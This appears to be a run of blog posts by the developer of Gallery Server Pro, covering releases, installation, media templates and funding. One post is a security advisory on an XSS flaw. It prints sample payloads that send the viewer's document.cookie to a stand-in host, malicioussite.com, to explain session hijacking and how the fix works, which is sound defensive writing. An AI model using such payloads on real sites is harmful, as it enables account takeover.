GSP to be released as DotNetNuke module

The headline gives away the surprise at the end of this post, but first let me tell you what’s been going on.

I previously blogged about how I am taking a temporarily break from full-time work on GSP to restock the savings account through a programming contract. That started in August and looks like it will continue for a few more months. It has been a real bummer being away from GSP – it is so unsatisfying to have so many things I want to do but not enough time to do them.

Your support continues to amazes me. In the last couple weeks there were three $100 donations. I truly appreciate every gift and am doing my best to get into a position where GSP is self-sustaining. Ultimately I plan to bring developers on staff to speed up the pace of development.

Work on GSP continues, but at a little slower pace than when I was at it full-time. Each evening I have a go, beginning with catching up on forum threads. There are a couple things you can expect in the coming months.

SQLite support in the Web Platform Installer (WPI)

Microsoft included support for SQLite in Web Platform Installer 2.0, released a few weeks ago. I am working with them to create a new package that takes advantage of this. This will allow an even easier installation process for GSP because you can use the file-based, self-contained SQLite database engine rather than SQL Server.

As long as I am modifying the package, I am trying to add support for choosing the type of SQL authentication for SQL Server users. The current version requires that you use a SQL login account – support for Windows authentication is not supported. Sounds easy enough, but the Web Platform Installer does not appear to allow for this. I am waiting to hear back from Microsoft as to whether we can somehow shoehorn this in. If not, we’ll have to settle for SQL-only authentication for a while.

Bug fixes

There are a few bug fixes I’d like to get out, so I’ll probably refresh all the packages when the WPI version is released.

DotNetNuke module

Today I am publicly announcing that Gallery Server Pro will soon be released as a DotNetNuke module. You have probably heard of DotNetNuke – it’s the most popular Content Management System (CMS) for .NET. Below is a screenshot of a default DNN installation with the GSP module running in a page.

The module preserves all the features of GSP 2.3 while integrating with core DNN functionality such as user membership and site-wide searching. I am nearly done with the coding – just a handful of items left that I think will take about 40 hours or so to finish up. Finding those 40 hours is a real challenge, so I can’t provide a firm release date. I can tell you it won’t be within the next month, but I can also tell you that I want to get it out the door as soon as possible.

The module will be released as a commercial product, although no price has yet been set. The goal is that the revenue will pay the bills so that I can continue to offer the stand-alone version of GSP as a free open source product. Let me repeat – there are absolutely no plans to begin charging for the regular version of GSP. I adore the donation model and it is one of the things I am most proud of. That will not change.

If you are wondering why someone would pay for a module when they can have the regular app for free, I have thought of that, too. And I’m not worried. Developers who build DNN sites are accustomed to paying for modules that provide the desired functionality. They are typically building sites for customers who are paying good money and they don’t mind shelling out a few bucks to get what they need. Having access to the free regular version doesn’t really help them because it won’t integrate into DNN.

Stay tuned for more information.

Installing Gallery Server Pro Just Got A Lot Easier

I am pleased to announce that I teamed up with Microsoft to create a greatly improved installation experience using their Web Platform Installer. Installing GSP is now as simple as clicking a few buttons and filling out a few textboxes. No more manually creating the web application or wrestling with NTFS permissions!

Plus, GSP is also being distributed by Microsoft through their Web Application Gallery. Web traffic doubled the day this went live, and it has only increased since then!

The Web Platform Installer has two requirements:

• You must have permission to run the program
• You must use SQL Server to store the data

Those of you who use hosting companies that restrict you from running applications on the server – or who want to use SQLite as your data store – should continue to use the existing installation process. Support for SQLite will be coming soon.

I will step through the installation process to show you how easy it is.

When you click the installation icon (above or on the download page), The Web Platform Installer starts. If you do not have it installed, you’ll be prompted to install it.

Gallery Server Pro is pre-selected, so click Install. The installer determines which dependencies are needed. You list could include more than shown here.

Note that the installer will want to install SQL Server Express. If you already have SQL Server available on your network, you can skip installing it by clicking the X next to it.

When you click I Accept, the installation begins.

After your requirements are installed, the installer asks where it should install Gallery Server Pro.

Then it will ask for some SQL connection info. Remember that the installer supports ONLY SQL Server. Support for SQLite will be coming soon.

The installation is finished. Woo hoo! Look Ma! No messing with IIS Manager, Network Service accounts, or NTFS!

Click the link to launch your new gallery:

Pretty sweet, huh? This is a significant step toward making GSP easier to install and use. Microsoft has been very helpful and they deserve our thanks for supporting open source projects like this. And I look forward to spending more time adding features to GSP and less time in the forums explaining how to give the Network Service account modify permission to a directory. Cheers!

A temporary diversion

Ever since introducing the product key a little over a year ago, donations have gone from a trickle to a consistent several hundred dollars per month, with a few months hitting $1000. Your support keeps me from having to get a real job so I can focus on GSP full time.

At least, that is the goal. In reality, my expenses are quite a bit more than $1000 a month, and this summer my savings account hit rock bottom. I called up a few consulting companies, and a fine one named Beacon Technologies hooked me up with a contract at CUNA Mutual Group. I am now working for them full time for the next few months.

Fortunately, these lucrative contracts bring in more money than I can spend, so after a few months the savings will be stoked and I can get back to full time work on GSP. I can’t wait to work on all the cool new features that are swimming around in my head. I am passionate about keeping GSP the top .NET web gallery and expect that it will soon become the #1 web gallery. I will be publishing a roadmap of the next major features in the near future.

Your donations have a direct effect on how much time I spend on GSP. Keep them coming so I can get back to GSP development. Thanks!

During this time I will continue to answer your questions on the forums and provide advice and assistance on your installation and customization efforts. Note that I am not available for contract work at this time, but will be when my CUNA contract is over, which is expected to last through summer 2010.

New Release Adds Support For Flash Video, H.264 and more

Today I posted the latest version of Gallery Server Pro. I added support for a few more media types, included a few new features, and fixed several bugs. Get it here.

Flash video and H.264

I blogged earlier about how to tweak your gallery to add support for Flash video and H.264 audio and video. Now it is included in the default installation. Note that you still have to enable the appropriate file extensions on the Media Object Types page in the Site admin area before you can add these media types. There are examples of videos in these formats in the video gallery.

Hidden directories ignored during synchronization

Starting with this version, any folders within the media objects directory will be ignored if it is marked as hidden. Use Windows Explorer to hide a directory, as seen here:

When a directory is hidden, it is ignored by GSP during the synchronization process.

Allow a membership or role provider to be specified by name

Prior to this release, GSP always assumed the default membership provider was the correct one. That is, GSP required the defaultProvider attribute for the membership, roles, and profile definitions in web.config to point to the the entry used by GSP. For example, by default GSP specifies the SQLiteMembershipProvider for membership in web.config:

<membership defaultProvider="SQLiteMembershipProvider">...</membership>

However, if you are integrating GSP into another application, this might create difficulty since your existing application may already have a default provider, and in some cases you want GSP to use a different one. Now you can go ahead and create the second provider definition in web.config.

<membership defaultProvider="YourMembershipProvider"> 
    <providers> 
        <clear /> 
        <add name="YourMembershipProvider" applicationName="Your application" ...additional stuff here... /> 
        <add name="SQLiteMembershipProvider" applicationName="Gallery Server Pro" ...additional stuff here... />   
    </providers> 
</membership>

Then, in galleryserverpro.config, you tell GSP the name of the membership provider in the new membershipProviderName attribute:

<galleryServerPro>
  <core ... membershipProviderName="SQLiteMembershipProvider" ... />
  ...
</galleryServerPro>

After this change, GSP will use SQLiteMembershipProvider for membership and your existing application is unaffected. You can do the same thing with roles using the roleProviderName attribute in galleryserverpro.config.

I could not figure out a way to programmatically access a non-default profile instance, so profile behavior is unchanged.

Perhaps the best use for this feature is to keep the roles used by GSP separate from the ones used in your application. You already know that you can create roles in the Site admin area to manage the security access your users have to albums. In addition, the user album and owner features automatically create roles behind the scenes. When you have a large number of users and especially when you have the user albums feature enabled, you can end up with a lot of roles. Normally, this isn't a problem - in fact, that is exactly why roles exist. However, if you are integrating GSP into an existing application, you may not want all the extra roles interfering with your "regular" roles.

The solution is to configure GSP to separate the roles into their own application space. A little primer: The ASP.NET membership system can use a single data store for one or more applications. An application is uniquely defined by the applicationName attribute in the membership, roles, and provider definitions in web.config. In the <membership> example above, there are two applications defined: "your application" and "Gallery Server Pro". If you peek in the aspnet_Applications table in your database, you will see one record for each. If you add a third provider with a new app name, ASP.NET will insert a third record into that table.

OK, hopefully that is enough background. Here is how to configure GSP to use the same membership (that is, list of users) but isolate the roles into its own application space. First, in web.config add a definition for the role provider to be used by GSP:

<roleManager defaultProvider="YafSqlRoleProvider" ...>
 <providers>
  <clear />
  <add applicationName="YAF" name="YafSqlRoleProvider" ... />
  <add applicationName="Gallery Server Pro" name="GspSqlRoleProvider" ... />
 </providers>
</roleManager>

In this example, GSP is not the default role provider, so we must tell GSP which one to use. We do this in galleryserverpro.config:

<galleryServerPro>
  <core ... roleProviderName="GspSqlRoleProvider" ... /> 
  ... 
</galleryServerPro>

SQLite users: If you use SQLite as your data store, there is one more step. Add the attribute membershipApplicationName to the role provider definition to tell the role provider the name of the membership provider that stores the list of users. So instead of the example above, it will look like this (replace "SQLiteMembershipProvider" with the correct name):

<roleManager defaultProvider="YafSqlRoleProvider" ...> 
<providers> 
  <clear /> 
  <add applicationName="YAF" name="YafSqlRoleProvider" ... /> 
  <add applicationName="Gallery Server Pro" membershipApplicationName="SQLiteMembershipProvider" name="GspSqlRoleProvider" ... /> 
</providers> 
</roleManager>

That is it. The roles needed by GSP are associated with GSP and the roles needed by the other application (in this case "YAF") are associated with it, and never the twain shall meet, even though they share the same list of users. As I said, I think this will be most useful when you do not want the roles used by GSP to clutter up the rest of your web application. Note that you may need to re-run the install wizard after making this change so that the admin account is correctly associated with the automatically created System Administrator role.

Bug fixes

There were a few bug fixes as well. You can view a detailed report of them on the Release History page.

Install and upgrade info

I have not yet updated the Admin Guide for this version, but the install and upgrade procedure is identical to previous versions, except for one small detail when upgrading. Before you upgrade, open gs\config\galleryserverpro.config and add the .m4a and .mp4 file extensions to the silverlightFileTypes configuration setting. That is, it should be ".mp3,.wma,.wmv,.asf,.asx,.mp4,.m4a". Then upgrade as normal. Later you will rename this file to galleryserverpro_old.config and run the Upgrade Wizard (see the Admin Guide for details). If you didn't make this change, the wizard would import the original value for this setting and you would find that Silverlight may not play your .m4a and mp4 files.

Play H.264 video and audio with Silverlight

Now that Silverlight 3 is out, with its new support for H.264 audio and video, several of you have been wondering how to play these files in Gallery Server Pro. I took a few minutes to look into this today, and it turned out to be really easy. Adding support is as simple as making a few edits to galleryserverpro.config. Here is what a H.264 video - with a file extension of .mp4 - looks like when played in Silverlight within Gallery Server Pro (live demo):

This works even if you are still using .NET 2.0 on the web server. The next release of Gallery Server Pro will include support for this, but until then you can follow these directions to get it working in 2.3:

Note that I assume your H.264 files use the .mp4 and .m4a file extensions. They will need some adjustment if you use other extensions.

1. Open \gs\config\galleryserverpro.config in a text editor such as Notepad.
2. In the <mimeTypes> section, add an entry for the .m4a file type: <mimeType fileExtension=".m4a" browserId="default" type="audio/m4a" allowAddToGallery="true" /> (There is already an entry for .mp4.)
3. Add .m4a and .mp4 to the silverlightFileTypes setting near the beginning of the file so that it looks like this: silverlightFileTypes=".mp3,.wma,.wmv,.asf,.asx,.mp4,.m4a"
4. Add HTML templates for the .m4a and .mp4 file types in the <mediaObjects> section:

<mediaObject mimeType="audio/m4a">
 <browsers>
  <browser id="default" htmlOutput="&lt;div id='mp1p'&gt;&lt;/div&gt;"
    scriptOutput="Sys.UI.Silverlight.Control.createObject('mp1p', '&lt;object type=&quot;application/x-silverlight&quot; id=&quot;mp1&quot; style=&quot;height:{Height}px;width:{Width}px;&quot;&gt;&lt;param name=&quot;minRuntimeVersion&quot; value=&quot;3.0.40624.0&quot; /&gt;&lt;param name=&quot;Windowless&quot; value=&quot;True&quot; /&gt;&lt;a href=&quot;http://go2.microsoft.com/fwlink/?LinkID=114576&amp;v=1.0&quot;&gt;&lt;img src=&quot;http://go2.microsoft.com/fwlink/?LinkID=108181&quot; alt=&quot;Get Microsoft Silverlight&quot; style=&quot;border-width:0;&quot; /&gt;&lt;/a&gt;&lt;/object&gt;'); Sys.Application.add_init(function() { $create(Sys.UI.Silverlight.MediaPlayer, { &quot;mediaSource&quot;: &quot;{MediaObjectUrl}&quot;, &quot;scaleMode&quot;: 1, &quot;source&quot;: &quot;{GalleryPath}/skins/mediaplayer/AudioGray.xaml&quot;,&quot;autoPlay&quot;:{AutoStartMediaObjectText} }, null, null, $get(&quot;mp1p&quot;)); }); Sys.Application.initialize();Array.add(_mediaObjectsToDispose, &quot;mp1&quot;);" />
  </browsers>
</mediaObject>

<mediaObject mimeType="video/mp4">
 <browsers>
  <browser id="default" htmlOutput="&lt;div id='mp1p'&gt;&lt;/div&gt;"
    scriptOutput="Sys.UI.Silverlight.Control.createObject('mp1p', '&lt;object type=&quot;application/x-silverlight&quot; id=&quot;mp1&quot; style=&quot;height:{Height}px;width:{Width}px;&quot;&gt;&lt;param name=&quot;minRuntimeVersion&quot; value=&quot;3.0.40624.0&quot; /&gt;&lt;param name=&quot;Windowless&quot; value=&quot;True&quot; /&gt;&lt;a href=&quot;http://go2.microsoft.com/fwlink/?LinkID=114576&amp;v=1.0&quot;&gt;&lt;img src=&quot;http://go2.microsoft.com/fwlink/?LinkID=108181&quot; alt=&quot;Get Microsoft Silverlight&quot; style=&quot;border-width:0;&quot; /&gt;&lt;/a&gt;&lt;/object&gt;'); Sys.Application.add_init(function() { $create(Sys.UI.Silverlight.MediaPlayer, { &quot;mediaSource&quot;: &quot;{MediaObjectUrl}&quot;, &quot;scaleMode&quot;: 1, &quot;source&quot;: &quot;{GalleryPath}/skins/mediaplayer/Professional.xaml&quot;,&quot;autoPlay&quot;:{AutoStartMediaObjectText} }, null, null, $get(&quot;mp1p&quot;)); }); Sys.Application.initialize();Array.add(_mediaObjectsToDispose, &quot;mp1&quot;);" />
  </browsers>
</mediaObject>

Savvy observers will notice these templates are exactly the same as the Silverlight templates used for .wma and .wmv files with one exception: They add a line specifying the minimum required version is 3.0.40624.0. The Silverlight javascript uses this to make sure the user has the latest version before attempting to play the file. The other Silverlight-related media files (.wma, .wmv, .mp3, etc) will play in any release of Silverlight dating back to 1.0.

Play Flash video in your gallery

There was recent activity in the forum with a user trying to play Flash video (.flv) in Gallery Server. He ended up getting it working by creating an HTML template in the configuration file galleryserverpro.config. His success sparked my interest and I checked into it further to see if this was something I can incorporate in the next full release.

He had used the JW FLV Media Player from longtail video, so I started there. After spending some time learning about the different features and playing with a few different configurations, I finally had something that worked great. I was just about to check in the code when it occurred to me that I should check the license. I should have done that in the first place, because there was trouble. It uses the Creative Commons Attribution-Noncommercial-Share Alike 3.0 Unported license. It allows free use and distribution when used non-commercially, which would be fine for many of you, but not everyone.

So I started looking around. It didn't take long until I came across flowplayer. It is a good-looking player and easy to configure. The best part is that it is released under the GPL, the same license as Gallery Server. I am not a lawyer, and please correct me if I am wrong, but I think that means I can include it with Gallery Server and not have to worry about the legal details.

Here you can see a Flash video playing in Google Chrome (see it for yourself):

The next release of GSP will include this feature, but you don't have to wait. The beauty of GSP's innovative templating engine is that you can customize the HTML that is rendered for media objects by editing galleryserverpro.config. No changes to the source code are necessary, nor do you have to recompile.

To add support for Flash video in your gallery, follow these steps:

1. Download flowplayer. Copy the following three files to the \gs\script\ directory in your gallery web application: flowplayer-3.1.1.min.js, flowplayer-3.1.1.swf, flowplayer.controls-3.1.1.swf
2. Open \gs\config\galleryserverpro.config in a text editor. In the <mimeTypes> section, add an entry for the .flv file type: <mimeType fileExtension=".flv" browserId="default" type="video/x-flv" allowAddToGallery="true" />
3. In the <mediaobjects> section earlier in galleryserverpro.config, add a template to define the HTML that is rendered for .flv files:

<mediaObject mimeType="video/x-flv">
 <browsers>
  <browser id="default"
 htmlOutput="&lt;script type=&quot;text/javascript&quot; src=&quot;{GalleryPath}/script/flowplayer-3.1.1.min.js&quot;&gt;&lt;/script&gt;&lt;a href=&quot;{MediaObjectUrl}&quot; style=&quot;display:block;width:{Width}px;height:{Height}px&quot; id=&quot;player&quot;&gt;&lt;/a&gt;"
 scriptOutput="flowplayer(&quot;player&quot;, { src: &quot;{GalleryPath}/script/flowplayer-3.1.1.swf&quot;, wmode: &quot;opaque&quot; }, { clip:  { autoPlay: {AutoStartMediaObjectText}, scaling: &quot;fit&quot; } });" />
 </browsers>
</mediaObject>

That is it! Add a .flv file to your gallery and it should play in any browser that has Flash installed. The video will start automatically if you have the autostart option enabled on the Video tab in the Site admin area. The width and height are defined on that page, too, so if you want it bigger or smaller, change it there (and then re-synchronize to update the existing media objects).

Note: If you have trouble, make sure IIS is configured to serve .flv file types (MIME type: video/x-flv).

If you want to better understand the template - maybe you want to tweak it to suit your preferences - it is helpful to copy the contents of the htmlOutput and scriptOutput attributes to a text editor and un-escape it. That is, replace &lt; with <, &gt; with >, and &quot; with ". It will be a lot easier to understand. Make your changes, then re-escape it when you copy it back to galleryserverpro.config. There is more info about the templating engine in the Admin Guide.

I updated the demo site to include a Flash video, so feel free to check it out.

Script error fixed in 2.3.3456

There is a bug that appeared in Gallery Server Pro 2.3.3456 released last week. I just fixed it and updated the download packages to include it. I didn't rev the version number because that takes a few hours and this didn't seem important enough to justify the effort.

This affects those of you who disable the image metadata feature, as seen here on the Media Objects - General page in the Site admin area:

If you kept this option enabled (which is the default), you are not affected by the issue.

When disabled, however, a javascript error occurs when you click the Next or Previous buttons as you browse an album. This is caused by a bug in the script file mediaobjectview.js. If this affects you, replace your version of this file with the latest one in one of the download packages (they all contain the same file). The file is located at \gs\script\mediaobjectview.js.

Administrator's Guide and Update Released

Today I released the Administrator's Guide for 2.3 with all new screen shots and updated information.

I also released another update for Gallery Server Pro. It contains another set of bug fixes, a couple minor new features, and a few minor behavior changes. Full details are on the Release History page.

The Admin Guide and the new release can be downloaded here.

Enjoy!

Update for 2.3 includes fix for security vulnerability

Today I posted version 2.3.3440 of Gallery Server Pro. It includes a couple minor features and several bug fixes. A complete list is on the Release History page. The QuickStart Guide with instructions for upgrading is on the Download page.

The most important bug fix is a cross-site scripting (XSS) vulnerability, and it affects all versions of Gallery Server Pro beginning with 2.1. Until you get a chance to upgrade to the latest version, I recommend you disable the ability to add external media objects. In the Site admin area, on the Media Objects - General page, uncheck the option as seen here:

In Depth: Cross-site scripting (XSS) vulnerability

The vulnerability exists in the external media object feature. This feature, introduced in 2.1, allows one to add snippets of HTML - such as embed code for a YouTube video - as a media object. The text entered by the user was not analyzed for malicious javascript. This was an intentional decision at the time because it was impossible to predict the HTML one might want to add, and some sites - such as CNN - use the <script> tag in their embed code. Since presumably administrators gave only trusted users the ability to add objects, this seemed like an acceptable thing to do.

But then version 2.3 introduced community galleries and self registration, and suddenly a much wider variety of users are able to add objects. Furthermore, I learned more about cross-site scripting attacks and learned how Gallery Server was vulnerable.

How serious is this vulnerability? In the worst case scenario, a hacker can log in to the gallery as a system administrator, meaning he or she can delete your media objects or change the settings in the Site admin area. This is accomplished by creating a specially crafted snippet of HTML and uploading it as an external media object. Each time the media object is viewed, the cookie of the user viewing it is sent to a remote web site, thereby putting it in the hands of the hacker. The hacker can then use the cookie to impersonate that user. For example, if an administrator viewed the malformed object, the hacker could subsequently log in as the gallery administrator and do anything the administrator can do. This is called session hijacking.

Note that this attack DOES NOT compromise the IIS configuration or allow the user to take over the web server. It appears to be restricted to allowing a hacker to log in under another gallery account.

It is possible this XSS vulnerability has other security implications, but as best I can tell this is the most important one to worry about.

 

What was changed

For 2.3.3440, the following changes were made:

• The scope of the configuration setting allowHtmlInTitlesAndCaptions was expanded to apply to external media objects. When false (the default value), the user is prevented from creating an external media object that contains HTML. (Note: It would be more appropriate to rename the setting allowUserEnteredHtml, but for the sake of backward compatibility and ease of upgrading the original name was preserved.)
• When HTML is explicitly enabled, the list of allowed HTML tags and attributes is severely restricted. They are listed in two new configuration settings in galleryserverpro.config: allowedHtmlTags and allowedHtmlAttributes. (Previously the list was hard-coded and applied only to the titles of albums and media objects.)
• A new configuration setting allowUserEnteredJavascript can be used to control whether javascript is allowed in user input. When false - which is the default - <script> tags and the string "javascript:" are banned.
• For album and media object titles, invalid HTML and javascript is automatically removed before being stored in the database. In previous versions, it was encoded (for example, < was replaced with &lt;).

I believe when these settings are used at their default values Gallery Server Pro is protected against XSS attacks, session hijacking, and any other attacks I have studied.

These changes mean that in the default configuration users can add only plain text as external media objects. To make this feature more useful, an administrator will want to enable the HTML setting. I believe that users are still protected against attacks when HTML is allowed as long as the list of allowed HTML tags and attributes remain at their default values.

When HTML is enabled, the following HTML tags and attributes are allowed. An administrator can edit these on the User Settings page in Site Admin.

Tags: p, a, div, span, br, ul, ol, li, table, tr, td, th, h1, h2, h3, h4, h5, h6, strong, b, em, i, u, cite, blockquote, address, pre, hr, img, dl, dt, dd, code, tt

Attributes: href, class, style, id, src, title, alt, target, name

You may still be vulnerable if you change the settings

Use caution when adding HTML tags and attributes to the "allowed" lists, especially event attributes such as onclick, onmouseover, etc. Consider the following HTML snippet, which sends the logged-on user's cookie to a remote web site and is a common technique used in session hijacking attacks to impersonate another user:

<p onclick="document.location='http://www.malicioussite.com/s.cgi?' + document.cookie">Click me</p>

Starting with 2.3.3440, this text cannot be entered as an external media object (or an album or media object title, for that matter) because it contains HTML. If you enable HTML, the text is still not valid because it contains the onclick attribute which is not in the list of allowed HTML attributes. However, if you add onclick to the list, this text can be entered, even if you have the javascript option disabled.

This is because javascript is very difficult to accurately detect. The allowUserEnteredJavascript setting prevents the use of <script> tags and "javascript:" strings, but they are not present in this example. Sure, Gallery Server Pro could search for document.cookie, but if it does that it needs to search for all the possible javascript statements, which is cumbersome and error-prone.

Note that the following sample does not work and is therefore not a security risk:

<a href="document.location='http://www.malicioussite.com/s.cgi?' + document.cookie">Click me</a>

Even though the a tag and href attribute are in the list of allowed HTML, hyperlinks require the use of the string "javascript:" like this:

<a href="javascript:document.location='http://www.malicioussite.com/s.cgi?' + document.cookie">Click me</a>

All of the allowed attributes in a default Gallery Server Pro installation require the use of the string "javascript:", so as long as you are restricting javascript input (that is, allowUserEnteredJavascript=false), you are protected.

Key points

• Starting with 2.3.3440, HTML and javascript are disabled by default for external media objects.
• The "Allow HTML" option on the User Settings page in the Site admin area now applies to external media objects in addition to captions and titles.
• If you previously enabled HTML in your gallery, then it is allowed but the HTML validator uses a slightly different list of valid HTML tags and attributes than what was previously hard-coded.
• There are no known vulnerabilities if you enable HTML with the default list of tags and attributes.
• Adding any event attribute such as onclick, onmouseover, etc to the list of allowed HTML attributes makes you vulnerable to XSS and session hijacking, even if you have the allow javascript option disabled.
• Enabling the use of javascript makes you vulnerable, even with the default list of HTML tags and attributes.

 

How to tell if your site has been compromised

If users have been able to add external media objects to your gallery, they may have already uploaded malicious code. The only sure way to determine if this has happened is to manually inspect the content of external media objects. This feature is not exposed in the UI, so you have to look in the database table. In your favorite SQL program (such as Management Studio for SQL Server or SQLite Manager for SQLite) run the following SQL:

SQLite: SELECT MediaObjectId, ExternalHtmlSource FROM gs_MediaObject WHERE LENGTH(ExternalHtmlSource) > 0

SQL Server: SELECT MediaObjectId, ExternalHtmlSource FROM gs_MediaObject WHERE LEN(ExternalHtmlSource) > 0

You will see the snippets of text that users entered when they added external media objects. If you see the text "document.cookie", that is a red flag. It is possible that a malicious user encoded the script to make it difficult to find, so be suspicious of any text you do not understand.

 

A tip for adding external media objects that use script or banned tags

As I mentioned earlier, some web sites include javascript or banned tags in their embed code. For example, here is a snippet of video from CNN.com:

<script src="http://i.cdn.turner.com/cnn/.element/js/2.0/video/evp/module.js?loc=dom&vid=/video/world/2009/06/02/bpr.plane.debris.found.cnn" type="text/javascript"></script><noscript>Embedded video from <a href="http://www.cnn.com/video">CNN Video</a></noscript>

The only way to add this to the gallery is to do three things: (1) enable javascript; (2) add the HTML tag script to the list of allowed tags; (3) add the HTML attribute type to the list of allowed attributes. Doing this makes you vulnerable to an XSS attack, so I do not recommend you use these settings on a long-term basis unless you totally trust your users that add objects. However, you *can* change the settings just long enough to add the code. Then go back to Site admin and revert to the previous settings. The snippet will continue to work, synchronizing won't break it, and your site is still safe.

Gallery Server Pro 2.3 Released!

After several months of non-stop work, I am happy to release the latest version of Gallery Server Pro! Among the thirty-three new features are:

• Faster, lighter, better-looking pages
• Zero-maintenance community galleries
• Improved handling of DIVX, PDF, TXT, HTML, RTF, Word docs and other files
• Support for read-only galleries
• Error logging
• Album paging
• Ability to download multiple items in a ZIP archive
• Many other usability enhancements...

There were also more than forty bugs fixed in this release. I described many of the new features in a previous post, so I won't repeat myself. For a complete list of features and bugs, including detailed reports from my tracking software, go to the Release History page.

Upgrading from 2.1 or 2.2 is a snap. Follow these simple steps:

1. Make a copy of your web.config, galleryserverpro.config and galleryserverpro_data.sqlite files.
2. Replace the files in the web application directory with the new ones (but don't delete your media object files).
3. (SQLite only) Replace the galleryserverpro_data.sqlite file in the App_Data directory with yours.
4. Run the upgrade wizard and follow the directions. The wizard is at default.aspx?g=upgrade. It will help you import your settings from web.config and galleryserverpro.config files.

These are the same upgrade steps you would have followed to upgrade to 2.2, so if you would like more detailed instructions, including how to upgrade from versions earlier than 2.1, refer to the Administrator's Guide.

Speaking of the Administrator's Guide, it will take a couple weeks to fully update this 200-page beast (uggh), so until then use the 2.3 QuickStart Guide to fill in some of the gaps.

As I previously mentioned, our savings account is nearly tapped out, so if you enjoy Gallery Server Pro, please consider a donation. Thanks!

The Financial Status of Gallery Server Pro (or: This Guy Needs A Summer Job)

People ask how I can manage to distribute Gallery Server Pro for free. Do I have a rich uncle? No. Are the donations really enough to pay the bills? Well, no, they are not. I want to be completely transparent with you, so here is a report of recent GSP registrations and donations (a registration is simply a request for a product key):

 

The average donation is $45, and has ranged from $1 all the way to $500. I find it inspiring that so many of you donate of your own free will, and $400 per month is a nice chunk of change. But I can't live on that. Margaret brings in about the same with her part-time job, so we have been slowly burning through our savings.

And now our money is about to run out, so I have to figure out a way to recharge the savings account. An avalanche of donations would be my preferred method, but that is unlikely to happen. Or will it? hint...hint...

I could start charging for GSP. Many have suggested I do just that, and people I respect believe it would be successful. But I am absolutely committed to keeping GSP free and open source. The fact that an average of 8% of you donate is quite impressive - If I can increase the number of registrations to 1000 or more per month, GSP will become self-sustaining. I intend to get there, but "there" has not yet arrived.

What I need to do is find a programming contract that keeps me fully employed for a month or two or six. This is where you come in. Is there a .NET project I can help you with? Would you like a customization of GSP for your website? Maybe there is some feature you would like, like a shopping cart, integration with Flickr, etc.

Visit Tech Info Systems for more information about my consulting and programming abilities. My resume is updated with the latest exaggerations. Contact me at roger*at*techinfosystems*dot*com or give me a ring at 920-563-3165. I will even fly to your location to discuss your project (you pay travel expenses). Projects in New Zealand are given top priority.

Help this guy get a summer job. And when my savings are again stocked, I will be back at GSP full time. There is a lot of great stuff in the pipeline, and I can't wait to open the spigots.

Gallery Server Pro 2.3 beta released

Today I am releasing the near-final version of Gallery Server Pro 2.3, with the full release expected by May 31. This is a significant release, with new features such as user albums, self-registration, album paging, and more. Read my previous blog entry for more details. A bonus feature not previously announced is support for changing settings in the Site Admin area in a Medium Trust environment (GoDaddy users rejoice!).

Play with an online demo of 2.3 beta here. The demo has self-registration and user albums enabled. Create a new account and notice how an album is automatically created. You have administrative rights to your album but not the others. I configured it so you have read-only permissions to the rest of the gallery, but you may want to give greater or less access. For example, you can set up your gallery so that each user can only view their own album but no others.

The demo also has album paging set to show a maximum of ten thumbnails per page. This is probably lower than what you would set in a production app, but it helps illustrate the idea.

Download the Gallery Server Pro 2.3 beta here.

Just like the current version, out of the box it will run on a 32-bit operating system running .NET 2.0 or higher. If you have a 64-bit OS, replace System.Data.SQLite.DLL in the bin directory with the 64-bit version. MS .NET 3.5 users should use the 3.5 version of web.config (look in the root directory).

The installation instructions for the 2.2 version of GSP also apply to 2.3, so read the Admin Guide for more information.

Please report any issues in the forum or with the contact form.

Unfinished items in the beta

• Do not try to upgrade your existing gallery to the beta, as the Upgrade Wizard is unfinished. The RTM version *will* allow you to easily upgrade from previous versions. The beta should be installed as a new web application and is to be used for testing purposes only.
• I will not provide an upgrade path from the beta to the final release. It *may* be possible to upgrade to the RTM version by simply replacing the web files, as no database changes are anticipated, but I make no promises.
• The restore function cannot restore from versions earlier than the beta. I expect to add support for this by the RTM.
• There are a few minor bugs, usability tweaks, and features that need to be completed.

Preview of Gallery Server Pro 2.3

There are  number of exciting new features coming in GSP 2.3 that expand on the already robust enterprise-level capabilities in Gallery Server Pro. Your feedback has been the driving force in telling me what areas I need to focus on. Please continue using the forum to let me what can be done better, what isn't working, and - if you are so inclined - what you really like!

I am targeting a release date of May 31 for 2.3. Nearly all the features and bug fixes are complete. I am now in the testing phase and working on the Upgrade Wizard. There are a few database changes which require a  SQL script, and I will make sure the Upgrade Wizard handles it all for you. This takes time but I am committed to making the path to 2.3 as robust and painless as possible.

New features in 2.3:

• Faster, lighter pages - Page size has been reduced up to 25% and the number of HTTP requests reduced up to 25%.
• Album ownership.
• Self-registration.
• User albums - An album can be automatically created and assigned to each user. The user owns that album with customizable permissions for managing its contents. This is great for community sites!
• Paging of thumbnail images in an album.
• Download multiple media objects in a ZIP file.
• Option to automatically delete the high resolution original image after upload, preserving only the thumbnail and compressed version.
• Allow recursive deletion of the high resolution images from an album.
• Clicking the download button for an image downloads the original image, not the compressed image.
• Error logging.
• Option to make an album private when it is created.
• Support SSL encryption of e-mails.
• Remove dependence on modifying global.asax when integrating into an existing ASP.NET application.
• Rounded corners of thumbnails and other objects (unfortunately, IE does not support this).
• Navigate back and forth using the left and right arrow keys instead of Enter and Shift-Enter.
• Allow a gallery to be built from a read-only directory.
• Support for .divx files.
• Play .avi and .wvx videos in the browser instead of creating a hyperlink.
• Show .pdf files in an inline frame.
• Show a hyperlink to easily open MS Word files instead of displaying the message "Your browser cannot display this media object...".
• Add support for .rtf files.
• Allow deleting albums in addition to media objects on the Delete objects page.
• Use of jQuery for advanced client effects.
• Almost all settings in galleryservepro.config now exposed in the Admin Site Settings area.
• Several other usability enhancements...

Many of these features are controlled by new switches that allow you to revert to the previous behavior if desired. So if you don't want to allow self-registration, just don't enable that feature.

In addition, there are several dozen bug fixes that improve reliability, performance, and the user experience.

I will give a brief overview of a few of the most significant changes.

Album ownership

Administrators can assign any user as the owner of an album. By default, owners can add, edit, and delete objects within the album. The permissions given to owners are defined in a template role named _Album Owner Template and can be easily changed using the Manage Roles page in the Site Admin area.

You can assign the owner on the Edit album info dialog window, as seen here:

In previous version of GSP you could accomplish the same thing, but you first had to create a role with the desired permissions, attach it to the album, and then add the user. This required going into the Site Admin area and navigating between two different pages. The new technique is cleaner and simpler. Behind the scenes, GSP is still creating that role for you, but now you don't have to worry about the details.

Self registration and user albums

You can allow users to create their own accounts and optionally to automatically create an album that each user owns. When enabled, a create account link appears in the top right that takes the user to a registration wizard:

 

There are a number of configuration options, which are accessible on a new page in the Site Admin area called User Settings:

 

Rounded corners and downloading objects in ZIP

